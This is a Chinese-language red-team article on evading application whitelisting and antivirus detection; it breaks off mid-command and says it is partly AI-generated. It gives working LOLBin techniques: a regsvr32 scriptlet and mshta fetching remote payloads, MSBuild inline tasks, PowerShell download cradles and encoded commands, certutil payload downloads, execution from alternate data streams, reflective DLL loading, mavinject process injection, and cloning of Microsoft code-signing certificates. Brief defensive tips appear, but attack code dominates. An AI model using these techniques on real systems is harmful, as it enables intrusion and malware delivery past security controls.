防御规避艺术:绕过应用白名单与杀软检测
项目地址: https://gitcode.com/gh_mirrors/aw/Awesome-Red-Teaming 本文深入探讨了现代红队行动中的高级防御规避技术,全面分析了应用程序白名单绕过、无文件攻击、内存注入、代码签名证书克隆以及AMSI绕过与进程伪装等关键技术。文章详细解析了各类技术的原理、实现方法和实战应用,包括系统工具滥用、脚本引擎利用、COM组件劫持、进程空洞化、证书链克隆等具体技术,并提供了完整的技术实现代码和流程图。通过对这些绕过技术的深入理解,安全团队可以更好地构建防御体系,而红队人员则可以更有效地测试和验证安全控制的有效性。
应用程序白名单绕过技术大全
在现代化的企业安全防御体系中,应用程序白名单(Application Whitelisting)技术已成为阻止未经授权代码执行的关键防线。然而,攻击者通过深入研究Windows系统的合法功能和信任机制,发现了多种巧妙的绕过技术。本文将深入剖析这些技术原理,并提供详细的技术实现细节。
白名单绕过技术分类
根据技术原理和利用方式,应用程序白名单绕过技术可分为以下几大类:
| 技术类别 | 代表技术 | 利用机制 | 防御难度 |
|---|---|---|---|
| 系统自带工具滥用 | Regsvr32、MSBuild、Rundll32 | 利用系统信任的合法程序加载恶意代码 | ⭐⭐⭐⭐ |
| 脚本引擎利用 | PowerShell、CScript、WScript | 通过脚本解释器执行恶意脚本 | ⭐⭐⭐⭐⭐ |
| COM组件劫持 | COM服务器注入、DLL劫持 | 利用组件对象模型的加载机制 | ⭐⭐⭐⭐ |
| 文件格式特性 | 备用数据流(ADS)、特殊文件格式 | 利用文件系统的特殊特性隐藏代码 | ⭐⭐⭐ |
| 信任机制滥用 | 代码签名伪造、证书克隆 | 滥用数字签名信任机制 | ⭐⭐⭐⭐⭐ |
核心技术详解
1. Regsvr32 COM脚本加载绕过
Regsvr32.exe是Windows系统中用于注册DLL组件的合法工具,但其/s和/u参数可被用于执行远程脚本:
<!-- malicious.sct -->
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
执行命令:
regsvr32 /s /u /i:http://example.com/malicious.sct scrobj.dll
2. MSBuild项目文件执行
MSBuild是.NET框架的构建工具,可通过编译特殊的项目文件执行代码:
<!-- malicious.csproj -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Security">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task {
public override bool Execute() {
System.Diagnostics.Process.Start("calc.exe");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
执行命令:
msbuild malicious.csproj
3. PowerShell诊断脚本绕过
利用PowerShell的诊断功能执行代码,绕过AppLocker限制:
# 通过诊断脚本执行
Invoke-DiagnosticScript -ScriptBlock {
Start-Process -FilePath "cmd.exe" -ArgumentList "/c calc.exe"
}
# 或者使用编码命令
$encodedCommand = [Convert]::ToBase64String(
[Text.Encoding]::Unicode.GetBytes('Start-Process calc.exe')
)
powershell.exe -EncodedCommand $encodedCommand
4. WMI和WinRM远程执行
通过Windows管理规范执行命令:
# WMI远程执行
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe"
# WinRM执行
$session = New-PSSession -ComputerName target-pc
Invoke-Command -Session $session -ScriptBlock { Start-Process calc.exe }
5. 备用数据流(ADS)技术
利用NTFS文件系统的备用数据流特性隐藏和执行代码:
# 创建ADS流
echo Start-Process calc.exe > normal.txt:malicious.ps1
# 执行ADS中的代码
powershell.exe -ExecutionPolicy Bypass -File normal.txt:malicious.ps1
# 或者使用wmic执行
wmic process call create "powershell.exe -ExecutionPolicy Bypass -File normal.txt:malicious.ps1"
技术实现流程图
防御规避技术对比分析
下表详细比较了各种绕过技术的特性和适用场景:
| 技术名称 | 系统要求 | 检测难度 | 权限要求 | 持久性 | 适用场景 |
|---|---|---|---|---|---|
| Regsvr32 | Win7+ | 高 | 用户权限 | 低 | 初始访问、代码执行 |
| MSBuild | .NET 4.0+ | 中 | 用户权限 | 中 | 开发环境、构建服务器 |
| PowerShell | Win7+ | 极高 | 用户权限 | 高 | 各种环境、高度隐蔽 |
| WMI | WinXP+ | 高 | 管理员权限 | 中 | 企业环境、远程管理 |
| ADS | NTFS | 中 | 用户权限 | 低 | 文件隐藏、规避检测 |
| COM劫持 | Win7+ | 极高 | 用户权限 | 高 | 持久化、权限维持 |
实战案例:多阶段绕过链
一个典型的多阶段应用程序白名单绕过攻击链如下:
检测与防御建议
针对应用程序白名单绕过技术,建议采取以下防御措施:
- 强化策略配置:使用仅允许模式而非默认的拒绝模式
- 进程监控:监控异常的子进程创建行为
- 网络过滤:限制出站连接,特别是到未知域名的连接
- 日志分析:深入分析Windows事件日志和PowerShell日志
- 应用控制:结合Device Guard和Credential Guard使用
技术演进趋势
随着防御技术的不断发展,应用程序白名单绕过技术也在持续演进:
- 无文件攻击:更多利用内存执行和进程注入技术
- Living-off-the-Land:深度利用系统自带工具
- 信任链滥用:利用数字签名和证书信任机制
- 云服务集成:滥用云服务和合法API进行C2通信
通过深入理解这些绕过技术的原理和实现方式,安全团队可以更好地构建防御体系,而红队人员则可以更有效地测试和验证安全控制的有效性。
无文件攻击与内存注入技术解析
在红队行动中,绕过传统安全检测机制是成功渗透的关键环节。无文件攻击(Fileless Attack)和内存注入技术作为防御规避的重要手段,通过避免在磁盘上留下痕迹,有效躲避基于文件特征的传统杀毒软件检测。这些技术利用系统自带工具和合法进程的内存空间执行恶意代码,实现了"隐身"攻击。
无文件攻击的核心原理
无文件攻击并非完全不使用文件,而是避免将恶意负载直接写入磁盘。攻击者通常利用以下几种技术路径:
1. 利用系统自带工具执行
# 使用PowerShell直接从内存加载和执行代码
IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
# 使用certutil下载文件到内存
certutil -urlcache -split -f http://example.com/payload.b64 payload.b64
certutil -decode payload.b64 payload.exe
2. 利用Windows管理工具
# 使用regsvr32执行远程脚本
regsvr32 /s /n /u /i:http://example.com/script.sct scrobj.dll
# 使用mshta执行HTML应用
mshta http://example.com/payload.hta
内存注入技术分类
内存注入技术主要分为以下几类,每种技术都有其独特的应用场景和优势:
1. 进程镂空(Process Hollowing)
进程镂空技术通过创建挂起的合法进程,然后替换其内存内容为恶意代码来实现隐蔽执行:
技术特点:
- 进程名称和路径合法
- 父进程关系正常
- 内存中执行恶意代码
- 难以被传统AV检测
2. 反射式DLL注入(Reflective DLL Injection)
反射式DLL注入技术允许DLL在内存中自行加载,无需通过LoadLibrary API:
// 反射加载器核心代码示例
typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
void* LoadLibraryR(LPVOID lpBuffer, DWORD dwLength) {
// 解析PE头信息
PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)lpBuffer;
PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)((DWORD)lpBuffer + pidh->e_lfanew);
// 分配内存并复制节区
LPVOID lpBase = VirtualAlloc(NULL, pinh->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// 重定位和修复导入表
// ...
// 调用DllMain
DLLMAIN DllMain = (DLLMAIN)((DWORD)lpBase + pinh->OptionalHeader.AddressOfEntryPoint);
(*DllMain)((HINSTANCE)lpBase, DLL_PROCESS_ATTACH, NULL);
return lpBase;
}
3. 进程注入(Process Injection)
通过向目标进程写入代码并创建远程线程来执行:
常用工具和技术实现
mavinject.exe 利用
mavinject.exe是Windows自带的合法工具,常用于应用程序兼容性修复,但也可被用于进程注入:
# 使用mavinject进行进程注入
mavinject.exe <PID> /INJECTRUNNING <DLL_PATH>
# 内存中执行
mavinject.exe 1234 /INJECTRUNNING C:\malicious.dll
技术优势:
- 使用微软签名二进制文件
- 绕过应用白名单限制
- 行为相对隐蔽
PowerShell 内存加载
PowerShell提供了强大的内存操作能力,是实施无文件攻击的理想工具:
# 从Base64字符串直接加载程序集
$assembly = [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($base64Payload))
# 使用反射调用方法
$type = $assembly.GetType("Malicious.Class")
$method = $type.GetMethod("Execute")
$method.Invoke($null, $null)
检测规避技术对比
下表总结了主要内存注入技术的检测规避特性:
| 技术类型 | 磁盘痕迹 | 进程行为 | 网络活动 | 检测难度 |
|---|---|---|---|---|
| 进程镂空 | 无 | 异常内存区域 | 可能 | 高 |
| 反射DLL注入 | 无 | 无模块加载 | 可能 | 极高 |
| 进程注入 | 无 | 远程线程创建 | 可能 | 中高 |
| mavinject利用 | 无 | 合法工具调用 | 可能 | 中 |
防御对抗策略
针对无文件攻击和内存注入技术,防御方需要采用多层防护策略:
1. 行为监控
- 监控异常进程创建模式
- 检测远程线程注入行为
- 分析内存访问异常模式
2. API调用监控
- 监控关键API调用序列
- 检测非常规内存分配模式
- 分析进程间通信异常
3. 机器学习检测
- 建立正常行为基线
- 检测偏离基线的异常行为
- 实时分析系统调用模式
实战应用场景
在实际红队行动中,无文件攻击技术常用于以下场景:
初始访问阶段:
- 通过鱼叉邮件传递无文件载荷
- 利用系统工具下载和执行第二阶段载荷
横向移动阶段:
- 在目标主机内存中执行侦察工具
- 通过WMI或PowerShell远程执行命令
持久化阶段:
- 使用计划任务触发内存驻留
- 通过WMI事件订阅执行内存载荷
技术发展趋势
随着防御技术的不断演进,无文件攻击技术也在持续发展:
1. 更高级的规避技术
- 使用硬件虚拟化技术
- 利用内核模式执行
- 采用更隐蔽的注入方式
2. 人工智能辅助
- 自动生成变异载荷
- 智能选择注入目标
- 自适应规避策略
3. 跨平台扩展
- Linux和macOS系统上的无文件攻击
- 容器环境中的内存注入
- 云原生环境适配
无文件攻击和内存注入技术代表了现代红队行动的先进技术水平,这些技术的有效运用需要深入理解操作系统内部机制和防御系统工作原理。随着安全防护技术的不断发展,攻击技术也在不断演进,形成了持续的技术对抗循环。
代码签名证书克隆与滥用技术
在红队行动中,绕过应用白名单和杀软检测是至关重要的防御规避技术。代码签名证书克隆技术允许攻击者创建看似合法的数字签名,使恶意代码能够伪装成受信任的软件供应商(如Microsoft)签名的应用程序,从而绕过安全检测机制。
证书克隆攻击原理
代码签名证书克隆攻击的核心在于利用数字签名验证过程中的信任链机制。攻击者通过以下步骤实现证书克隆:
数字签名验证通常包括以下关键检查点:
- 完整性验证:文件哈希是否与签名中的哈希匹配
- 证书链验证:每个证书是否由其父证书正确颁发
- 有效性检查:证书是否在有效期内
- 吊销检查:证书是否被吊销
- 根CA验证:根证书是否受信任
技术实现细节
证书链导出与克隆
攻击者首先需要导出合法的证书链作为模板:
# 导出合法Microsoft证书链
$Cert = Get-AuthenticodeSignature -FilePath C:\Windows\System32\kernel32.dll
$Cert.SignerCertificate | Export-Certificate -FilePath .\MicrosoftCert.cer -Type CERT
创建克隆证书链
使用PowerShell的New-SelfSignedCertificatecmdlet创建克隆证书:
# 克隆Microsoft证书链
$ClonedRoot = New-SelfSignedCertificate -CloneCert (Get-PfxCertificate -FilePath .\MicrosoftRoot.cer) `
-CertStoreLocation Cert:\CurrentUser\My
$ClonedIntermediate = New-SelfSignedCertificate -CloneCert (Get-PfxCertificate -FilePath .\MicrosoftIntermediate.cer) `
-Signer $Cl创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
